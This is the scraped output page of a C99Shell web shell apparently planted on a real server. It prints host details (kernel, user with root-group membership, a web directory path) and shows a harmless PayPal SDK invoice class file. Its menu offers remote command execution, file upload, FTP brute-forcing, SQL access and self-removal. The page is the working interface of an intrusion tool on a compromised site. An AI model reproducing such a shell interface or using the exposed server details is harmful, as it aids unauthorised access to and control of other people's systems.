!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InvoiceSearchResponse.php (1.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class InvoiceSearchResponse
 *
 * 
 *
 * @package PayPal\Api
 *
 * @property int total_count
 * @property \PayPal\Api\Invoice[] invoices
 */
class InvoiceSearchResponse extends PayPalModel
{
    
/**
     * Total number of invoices.
     *
     * @param int $total_count
     * 
     * @return $this
     */
    
public function setTotalCount($total_count)
    {
        
$this->total_count $total_count;
        return 
$this;
    }

    
/**
     * Total number of invoices.
     *
     * @return int
     */
    
public function getTotalCount()
    {
        return 
$this->total_count;
    }

    
/**
     * List of invoices belonging to a merchant.
     *
     * @param \PayPal\Api\Invoice[] $invoices
     * 
     * @return $this
     */
    
public function setInvoices($invoices)
    {
        
$this->invoices $invoices;
        return 
$this;
    }

    
/**
     * List of invoices belonging to a merchant.
     *
     * @return \PayPal\Api\Invoice[]
     */
    
public function getInvoices()
    {
        return 
$this->invoices;
    }

    
/**
     * Append Invoices to the list.
     *
     * @param \PayPal\Api\Invoice $invoice
     * @return $this
     */
    
public function addInvoice($invoice)
    {
        if (!
$this->getInvoices()) {
            return 
$this->setInvoices(array($invoice));
        } else {
            return 
$this->setInvoices(
                
array_merge($this->getInvoices(), array($invoice))
            );
        }
    }

    
/**
     * Remove Invoices from the list.
     *
     * @param \PayPal\Api\Invoice $invoice
     * @return $this
     */
    
public function removeInvoice($invoice)
    {
        return 
$this->setInvoices(
            
array_diff($this->getInvoices(), array($invoice))
        );
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--